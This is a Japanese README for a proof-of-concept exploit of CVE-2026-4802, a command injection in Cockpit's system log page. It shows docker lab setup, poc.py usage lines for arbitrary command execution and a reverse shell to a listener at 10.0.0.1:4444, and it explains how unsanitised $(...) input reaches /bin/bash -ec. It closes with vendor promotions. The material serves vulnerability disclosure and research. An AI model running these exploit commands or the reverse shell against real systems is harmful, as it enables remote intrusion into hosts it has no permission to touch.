
CVE-2026-4802の概念実証エクスプロイト。CockpitのシステムログUIにおけるコマンドインジェクションの脆弱性で、任意のコマンド実行とリバースシェルを可能にします。
CVE-2026-4802の概念実証エクスプロイトです。CockpitのシステムログUI(loadServiceFilters())におけるコマンドインジェクションによるリモートコード実行です。
脆弱な環境をビルドして実行します:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# ターゲットが脆弱かどうかを確認
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# 任意のコマンドを実行
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# リバースシェル
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444
pkg/systemd/logsJournal.jsxを含む未パッチ版)pkg/systemd/logsJournal.jsx内のloadServiceFilters()関数は、配列を文字列に結合してスペースのみでエスケープした後に/bin/bash -ecへ渡すことでシェルコマンドを構築します。ログページのURLフラグメント(例: --since=)からのユーザー制御パラメータは、サニタイズされずにこのコードパスに到達するため、コマンド置換($(...))などのシェルメタ文字の注入が可能になります。
このツールは教育および研究目的のみで使用してください。所有しているシステム、または明示的なテスト許可を得たシステムでのみ使用してください。作者は、このプログラムの誤用または損害について一切の責任を負いません。
QuimeraX Intelligenceは、複雑なシステムにおける重大な脆弱性の特定を専門とする高度なEASMおよびサイバー脅威インテリジェンスプラットフォームです。このプラットフォームは、セキュリティ脅威を積極的に監視、検出し、クライアントに警告することで、透明性と潜在的なリスクへの迅速な対応を保証します。クライアントは、システムが脆弱であると判明した場合に即時の通知と包括的なレポートを受け取り、保護措置を講じることができます。詳細はこちら
Hakai Securityは、セキュリティ専門家によって設立されたサイバーセキュリティ企業であり、技術的卓越性に取り組んでいます。高度なペネトレーションテスト、現実的なレッドチームシミュレーション、セキュアな開発プラクティスなど、クライアントの資産を進化するサイバー脅威から積極的に保護するためのカスタマイズされたセキュリティソリューションを提供しています。